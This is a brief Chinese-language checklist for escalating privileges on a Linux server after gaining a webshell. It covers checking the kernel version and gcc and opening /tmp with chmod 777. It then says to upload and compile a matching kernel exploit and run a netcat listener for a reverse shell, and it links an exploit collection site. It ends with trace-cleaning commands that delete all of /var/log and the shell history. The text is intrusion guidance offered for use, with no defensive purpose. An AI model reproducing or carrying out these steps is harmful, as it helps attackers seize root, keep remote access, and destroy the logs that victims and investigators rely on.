linux提权基本思路整理

拿到linux服务器的webshell后，先看有没有执行命令的权限

uname -a查看linux的内核版本

gcc --help试探服务器是否可以进行gcc编译(有些exp没有编译)

访问/tmp目录，看是否有所有权限

如果没有，则通过 chmod -R 777 开启

上传对应内核版本的exp到/tmp目录，然后执行./exp名

没编译的则运行gcc -o /tmp/文件名 /tmp/文件名.c

 nc反弹

nc -l -n -v -p 12666

附个常用exp收集地址：http://exp.0x80c.com/

 

痕迹清理：

rm -f -r /var/log/*
rm .bash_history
rm recently_used